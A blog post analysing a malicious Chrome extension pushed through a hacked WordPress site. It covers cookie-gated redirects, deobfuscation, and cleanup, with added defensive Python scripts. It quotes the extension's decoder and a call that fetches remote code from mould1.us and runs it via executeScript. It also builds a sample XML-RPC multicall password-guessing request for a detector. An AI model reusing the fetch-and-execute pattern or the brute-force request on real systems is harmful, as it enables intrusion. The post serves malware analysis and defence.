Malware basics: Analyzing a possible malware inside a Chrome extension

Today I came across a website with a sadly familiar problem: it had been compromised to serve malvertising. The curious thing is that the attacker hijacked the site so that it (sometimes) redirects to a page that tries to “convince” you to install a Chrome extension which asks for permission to read and modify the content of every site you visit. This is the analysis of the problem.

What software is underneath

First of all, I checked what software was running underneath the page, so the first thing to do was to open the source code. Seeing this was enough to realize that it was a WordPress installation. The site name is redacted; naming a compromised victim would not be fair.

<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/  Served from: {SITE REDACTED} @ 2017-05-15 14:23:41 by W3 Total Cache -->

W3 Total Cache is a very common WordPress plugin that keeps a cache so pages, especially static ones, are served faster. Since it only exists for WordPress, this one comment already tells us the software behind the site.

It does not show again

When I try to access the site again, it does not try to push the malvertising Chrome extension on me a second time. How is this possible? I immediately suspect that it sets a cookie to record the last time the browser visited the site, so I use my beloved EditThisCookie extension to see what happens. I delete all the cookies related to the site and there it goes: the redirection again!

Right now, this is enough. It is common not to redirect on every visit, to minimize the probability of being “caught”. Other gates you will often see in these injections are the Referer header (only visitors arriving from a search engine are redirected) and the User-Agent (crawlers and security scanners get the clean page), so when reproducing a redirect it pays to control all three.

The redirection

When the cookie is not present, the site redirects to a landing page (the screenshot is not reproduced here).

The page is pure gold: annoying sounds, images that look like pop-ups… everything designed to make you click where you don’t want to click. The most curious thing about this page is that it promises you an extension to get rid of advertisements. Oh, the irony.

Something to notice is that the English on that page is totally broken, most likely produced with an automated translator. A simple WHOIS check tells me that the registered domain owner is Anatoliu Golovin. By the name, you can already draw some conclusions. The WHOIS database is not totally reliable, but this already gives a hint: the person running the scheme is pretty lazy (he did not even take care of hiding his own name, even though services such as WhoisGuard make that trivial). An extra DNS check tells me that the page is served from the USA (which does not really matter much anyway).

The extension

The extension the guy is trying to make you install is called “Tetris” and it is directly associated with the domain. It can be found here (don’t install it unless you are a masochist). As of the evening of the 15th of May 2017, it has 297 active users and 0 ratings.

I use the free Chrome Extension Downloader service to fetch the CRX package, which gives me the extension’s files without actually installing it, and proceed to analyze it.

Analysis

First of all, remember that a CRX file is just a ZIP archive with a small signed header in front (the “Cr24” magic, a version number and the signing key and signature), so either strip the header or let the unzip tool skip it, and decompress it. The first thing to look at is “manifest.json”, which tells us the layout of the extension, which scripts get executed and which permissions are requested. This one basically asks for permission to read and modify every web page that you visit.
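The header parsing and manifest review described above, as an added example (not code from the original post or from the extension): it locates the ZIP inside a CRX2 or CRX3 container, reads manifest.json without installing anything, and flags all-site host access, sensitive permissions and the background scripts that deserve a closer look. The sample CRX it builds is constructed here; its manifest is modelled on what the post describes, not copied from the real extension, and its CRX3 header is a zero-filled placeholder where a real file carries a protobuf with the key and signature.

```python
import io
import json
import struct
import zipfile

# Host patterns and permissions that, on their own, let an extension read or
# rewrite every page the user visits (what the manifest on this page asks for).
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
SENSITIVE_PERMS = {"tabs", "webRequest", "webRequestBlocking", "scripting", "cookies"}


def crx_zip_offset(data: bytes) -> int:
    """Return the byte offset at which the embedded ZIP archive starts.

    CRX2: 'Cr24' | version=2 | pubkey_len | sig_len | pubkey | sig | ZIP
    CRX3: 'Cr24' | version=3 | header_len | header (protobuf) | ZIP
    All integers are little-endian uint32.
    """
    if data[:4] != b"Cr24":
        raise ValueError("not a CRX file: bad magic")
    version = struct.unpack_from("<I", data, 4)[0]
    if version == 2:
        key_len, sig_len = struct.unpack_from("<II", data, 8)
        return 16 + key_len + sig_len
    if version == 3:
        header_len = struct.unpack_from("<I", data, 8)[0]
        return 12 + header_len
    raise ValueError(f"unsupported CRX version {version}")


def read_crx(data: bytes) -> tuple[dict, list[str]]:
    """Return (manifest, list of file names) from a CRX without installing it."""
    with zipfile.ZipFile(io.BytesIO(data[crx_zip_offset(data):])) as zf:
        manifest = json.loads(zf.read("manifest.json"))
        return manifest, zf.namelist()


def review_manifest(manifest: dict) -> dict:
    """Summarise what the extension can touch: all-site host access, sensitive
    permissions, and which scripts run in the background (the usual place for
    the interesting code, as on this page)."""
    perms = set(manifest.get("permissions", []))
    perms |= set(manifest.get("host_permissions", []))        # manifest v3 form
    content_matches = set()
    for cs in manifest.get("content_scripts", []):
        content_matches |= set(cs.get("matches", []))
    background = manifest.get("background", {})
    bg_scripts = list(background.get("scripts", []))          # manifest v2 form
    if "service_worker" in background:                        # manifest v3 form
        bg_scripts.append(background["service_worker"])
    return {
        "manifest_version": manifest.get("manifest_version"),
        "all_sites": bool((perms | content_matches) & BROAD_HOSTS),
        "sensitive": sorted(perms & SENSITIVE_PERMS),
        "background_scripts": bg_scripts,
    }


def build_sample_crx() -> bytes:
    """Constructed CRX3 for demonstration only. The manifest is modelled on the
    post's description (all-URL access, tabs, a game script plus a background
    script), not copied from the real extension; the header is a placeholder."""
    manifest = {
        "manifest_version": 2,
        "name": "Tetris",
        "version": "1.0",
        "permissions": ["tabs", "<all_urls>"],
        "background": {"scripts": ["js/background.js"]},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["script.js"]}],
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("script.js", "// game code placeholder")
        zf.writestr("js/background.js", "// background page placeholder")
    header = b"\x00" * 16
    return b"Cr24" + struct.pack("<II", 3, len(header)) + header + buf.getvalue()


if __name__ == "__main__":
    manifest, files = read_crx(build_sample_crx())
    print(files)
    print(review_manifest(manifest))
```

On a real download, pass the file contents to `read_crx` instead of `build_sample_crx()`; `unzip` also copes with the prepended header, but computing the offset yourself is what you want when scripting this across many extensions.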

There are two JavaScript files. At first glance script.js seems to be a harmless game, but an obfuscated section in js/background.js catches my attention. First, because it is the only obfuscated part (the guy is lazy, remember) and second, because it builds weird strings out of lookup tables. This immediately makes me suspicious. The beautified obfuscated JavaScript is on a public gist here (done with the help of JSBeautifier.org).

Let’s proceed to “deobfuscate” the strings. For this, we use the Chrome JavaScript console in an incognito window. This looks like the function that brings the strings back to life: it maps each integer of the input array to a character of a fixed lookup table. Note the clever usage of the “b-a-d” combination of letters. Paste only this decoder and the index arrays into the console, never the rest of the script, since that would execute the extension’s logic in your own browser.

function GGamePlayerInTetris(a) {
    for (var b = ["a", "b", "c", "d", "e", "f", "g", ":", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "/", "r", "s", "t", "u", "v", "w", "x", ".", "y", "z", "S", "1"], c = "", d = 0; d < a.length; d++) c += b[a[d]];
    return c
}

It is called from another piece of code, with:

var a = [21, 0, 1, 20];

Executing that function with that parameter yields the string “tabs”. So far, this seems promising. The call is made from this function:

function vGamePlayerInTetris() {
    var a = function() {
            return "chrome"
        },
        b = [21, 0, 1, 20];
    return window[a()][GGamePlayerInTetris(b)]
}

This is equivalent to:

function vGamePlayerInTetris() {
    return window["chrome"]["tabs"];
}

And so it is replaced. The same is done with the rest of the suspicious strings. While analyzing the (apparent) malware extension, I found that it requests this URL, which was obfuscated, through an HTTP GET:

jQuery.get("https://mould1.us/moul/tetrisgameplayaer.php", function(a) { /* ... */ });

It stores the response in the browser’s local storage for persistence and executes it through a call to “executeScript”. Sadly, when I tried to fetch the URL myself, the content was gone for good, returning 404. Most likely because the guy noticed that he was spending more money on the “campaign” than he was earning, or because some malware fighter got it taken down. Note that a 404 to my client does not prove the payload is gone: such endpoints often serve content only to requests that look like they come from the extension, or only once per IP. The domain was, nonetheless, registered under the same name as the main one. Anyway, the analysis has to stop here (which is good news).
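The “same is done with the rest of the strings” step can be automated instead of repeated by hand in the console. The following is an added example (not from the post or the extension): it copies the lookup table from GGamePlayerInTetris, decodes every integer-array literal in a source file statically, without executing any of it, and keeps the results that look like URLs or API names. It also generalises slightly: the same scan works for any table-indexed string obfuscation, you only swap the table. The JavaScript it scans is constructed here from the strings the post recovered (the arrays are generated with encode(), so they are guaranteed consistent with the table), plus one array of game data to show how noise is filtered out. One observation the code relies on: the 31-symbol table contains ':', '/', '.', '1' and a capital 'S', exactly the extra characters needed to spell an https:// URL, the "mould1" host and "executeScript".

```python
import re

# Lookup table copied verbatim from the extension's GGamePlayerInTetris().
# It is only 31 symbols, yet it contains ':', '/', '.', '1' and a capital 'S':
# exactly what is needed to spell an https:// URL and "executeScript".
TABLE = ["a", "b", "c", "d", "e", "f", "g", ":", "h", "i", "j", "k", "l", "m",
         "n", "o", "p", "q", "/", "r", "s", "t", "u", "v", "w", "x", ".", "y",
         "z", "S", "1"]

# Decoded strings worth a second look: URLs, chrome.* API names, script sinks.
INTERESTING = re.compile(r"https?://|\.php|executeScript|tabs|storage|eval")

# Any integer-array literal in the source, e.g. [21, 0, 1, 20].
ARRAY_LITERAL = re.compile(r"\[\s*(\d+(?:\s*,\s*\d+)*)\s*\]")


def decode(indices, table=TABLE):
    """Same mapping as GGamePlayerInTetris: index -> table character."""
    return "".join(table[i] for i in indices)


def encode(text, table=TABLE):
    """Inverse mapping; used only to build the constructed sample below."""
    return [table.index(c) for c in text]


def find_encoded_strings(source, table=TABLE):
    """Decode every integer array in `source` whose elements all index into
    `table`, statically, without running any of the script. Returns
    {array literal: decoded string}. Arrays with out-of-range values cannot be
    encoded strings and are skipped."""
    decoded = {}
    for m in ARRAY_LITERAL.finditer(source):
        indices = [int(x) for x in m.group(1).split(",")]
        if indices and all(i < len(table) for i in indices):
            decoded[m.group(0)] = decode(indices, table)
    return decoded


def triage(source, table=TABLE):
    """Keep only decoded strings that look like URLs or API/sink names, so
    game data that happens to be small integers (board rows etc.) drops out."""
    return {lit: s for lit, s in find_encoded_strings(source, table).items()
            if INTERESTING.search(s)}


# Constructed sample in the style of the post's background.js. The arrays are
# generated with encode() from the strings the post recovered; the board is
# game data that is not a string at all.
SAMPLE_JS = f"""
function vGamePlayerInTetris() {{
    var a = function() {{ return "chrome" }}, b = {encode("tabs")};
    return window[a()][GGamePlayerInTetris(b)]
}}
var board = [[0, 0, 1, 1], [1, 1, 0, 0]];
var url = GGamePlayerInTetris({encode("https://mould1.us/moul/tetrisgameplayaer.php")});
var sink = GGamePlayerInTetris({encode("executeScript")});
"""

if __name__ == "__main__":
    for literal, text in triage(SAMPLE_JS).items():
        print(f"{literal} -> {text}")
```

Run it against the beautified background.js by reading the file into `source` and calling `triage(source)`; every hit is a literal you can then search for in the script to see which sink it feeds.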

How does this happen?

The cause, most likely, is a weak WordPress admin password, brute-forced through an XML-RPC amplified brute-force attack (the system.multicall method lets a single HTTP request carry hundreds of login attempts, which defeats per-request rate limits), or, less likely, the compromise of the whole server.
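To make the amplification concrete, here is an added example (not part of the original post) that parses an XML-RPC request body the way a reverse proxy or WAF rule in front of xmlrpc.php would: it counts how many credential-bearing calls one system.multicall carries and which usernames they target, and applies the rule that a multicall with more than one login attempt is never legitimate client traffic. The attacker request it inspects is constructed by build_multicall(); the list of credential-taking methods is an assumption covering the WordPress methods commonly abused for this, not an exhaustive list.

```python
import xml.etree.ElementTree as ET

# XML-RPC methods that take a username/password pair: each one nested inside a
# system.multicall is a separate login attempt, checked server-side in one
# request. Assumed list of the commonly abused ones, not exhaustive.
AUTH_METHODS = {"wp.getUsersBlogs", "wp.getProfile", "wp.getPosts", "wp.getPages",
                "wp.getCategories", "metaWeblog.getUsersBlogs", "blogger.getUsersBlogs"}


def _string(value_el):
    """An XML-RPC <value> either wraps <string>...</string> or carries bare text."""
    if value_el is None:
        return None
    s = value_el.find("string")
    return (s.text if s is not None else value_el.text or "").strip()


def inspect_xmlrpc(body: str) -> dict:
    """Count how many authenticated calls one request body carries and which
    usernames they target. Raises ET.ParseError on malformed XML, which a
    front-end filter should treat as a block as well."""
    root = ET.fromstring(body)
    top = root.findtext("methodName")
    report = {"method": top, "calls": 0, "auth_attempts": 0, "usernames": set()}
    if top != "system.multicall":
        report["calls"] = 1
        report["auth_attempts"] = int(top in AUTH_METHODS)
        return report
    for st in root.iter("struct"):
        members = {m.findtext("name"): m.find("value") for m in st.findall("member")}
        name = _string(members.get("methodName"))
        if name is None:
            continue  # a struct inside some call's params, not a call itself
        report["calls"] += 1
        if name in AUTH_METHODS:
            report["auth_attempts"] += 1
            params = members.get("params")
            values = params.findall("array/data/value") if params is not None else []
            if values:  # first positional parameter is the username
                report["usernames"].add(_string(values[0]))
    return report


def is_amplified_bruteforce(report: dict, threshold: int = 2) -> bool:
    """Blocking rule: one multicall carrying several credential checks."""
    return report["method"] == "system.multicall" and report["auth_attempts"] >= threshold


def build_multicall(username: str, passwords) -> str:
    """Constructed attacker request: one HTTP POST, len(passwords) login attempts."""
    calls = "".join(
        "<value><struct>"
        "<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
        "<member><name>params</name><value><array><data>"
        f"<value><string>{username}</string></value><value><string>{pw}</string></value>"
        "</data></array></value></member>"
        "</struct></value>"
        for pw in passwords)
    return ("<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName>"
            f"<params><param><value><array><data>{calls}</data></array></value></param></params></methodCall>")


# Constructed legitimate request for comparison: a single wp.getUsersBlogs call.
SINGLE_CALL = ("<?xml version=\"1.0\"?><methodCall><methodName>wp.getUsersBlogs</methodName>"
               "<params><param><value><string>admin</string></value></param>"
               "<param><value><string>hunter2</string></value></param></params></methodCall>")

if __name__ == "__main__":
    attack = inspect_xmlrpc(build_multicall("admin", ["123456", "password", "admin2017"]))
    print(attack, is_amplified_bruteforce(attack))
    print(inspect_xmlrpc(SINGLE_CALL), is_amplified_bruteforce(inspect_xmlrpc(SINGLE_CALL)))
```

The report is also what you want in the incident log: the targeted usernames tell you which accounts need a password reset even if the attack did not succeed.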

The solution

The fix starts with finding which files of the WordPress installation have been modified. There are usually mass modifications, so restoring all the files from a known-good backup is usually the easiest, safest and fastest option. Then restore the database from a proper backup if there is any modification (I would do it anyway), change the admin password to one of proper strength, and restrict requests to the XML-RPC implementation built into WordPress, being careful not to break the functionality of any plugin that relies on it (the easiest method is perhaps installing the official Jetpack plugin from WordPress.org, which offers this protection). While you are at it, rotate the passwords of every administrator-level account and remove any account you do not recognize, since an extra admin user is the most common way back in after a cleanup.
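Finding the modified files is easier with a hash comparison than with mtimes, which an attacker can reset. The following is an added example (not from the post): it hashes a known-good tree (a fresh download of the same WordPress version, or the last clean backup) and the suspect tree, reports modified, added and missing files, and separately flags PHP files dropped under wp-content/uploads or wp-content/cache, where WordPress never writes PHP itself. It assumes wp-config.php legitimately differs from the reference and ignores it; when comparing against a vanilla download rather than your own backup, plugins and themes are also expected to differ. The two directory trees it compares are constructed in temporary directories; the altered file and the dropped file are placeholders, not the real injection.

```python
import hashlib
import os
import tempfile
from pathlib import Path


def hash_tree(root: str) -> dict:
    """{relative path: sha256} for every file under root (paths use '/')."""
    hashes = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, "rb") as fh:
                hashes[rel] = hashlib.sha256(fh.read()).hexdigest()
    return hashes


# Files that legitimately differ from a clean reference copy (assumed set).
IGNORE = {"wp-config.php"}

# WordPress itself never writes PHP into these directories.
NO_PHP_DIRS = ("wp-content/uploads/", "wp-content/cache/")


def compare_trees(clean: str, suspect: str) -> dict:
    a, b = hash_tree(clean), hash_tree(suspect)
    modified = sorted(p for p in a if p in b and a[p] != b[p] and p not in IGNORE)
    added = sorted(set(b) - set(a))
    missing = sorted(set(a) - set(b))
    planted = [p for p in added if p.endswith(".php") and p.startswith(NO_PHP_DIRS)]
    return {"modified": modified, "added": added, "missing": missing, "planted_php": planted}


def _write(root: str, rel: str, text: str) -> None:
    path = Path(root, rel)
    path.parent.mkdir(parents=True, exist_ok=True)
    path.write_text(text)


def demo() -> dict:
    """Constructed fixture: a 'clean' tree and a 'suspect' copy with one core
    file altered and one PHP file dropped into uploads (placeholders only)."""
    with tempfile.TemporaryDirectory() as clean, tempfile.TemporaryDirectory() as suspect:
        for root in (clean, suspect):
            _write(root, "index.php", "<?php require __DIR__ . '/wp-blog-header.php';\n")
            _write(root, "wp-includes/functions.php", "<?php // core\n")
            _write(root, "wp-config.php", f"<?php // site specific: {root}\n")
        _write(suspect, "wp-includes/functions.php", "<?php // core\n/* injected placeholder */\n")
        _write(suspect, "wp-content/uploads/2017/05/x.php", "<?php // dropped file placeholder\n")
        return compare_trees(clean, suspect)


if __name__ == "__main__":
    print(demo())
```

On a real incident call `compare_trees("/path/to/clean-wordpress", "/var/www/site")` and read the modified list before wiping anything: those files are where the injected redirect (and its cookie check) will be, and they are worth keeping as evidence.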

Conclusions

Even though this analysis is very incomplete (since the main script could not be retrieved), I hope it has helped you understand the basic steps of this kind of malware analysis. Be aware that the Chrome Web Store is full of this kind of crap, and the automated analysis done on extensions before they are accepted into the store very rarely detects this kind of danger, precisely because the real payload is fetched at runtime and is not in the package being reviewed. Overall, I hope you have learned something.
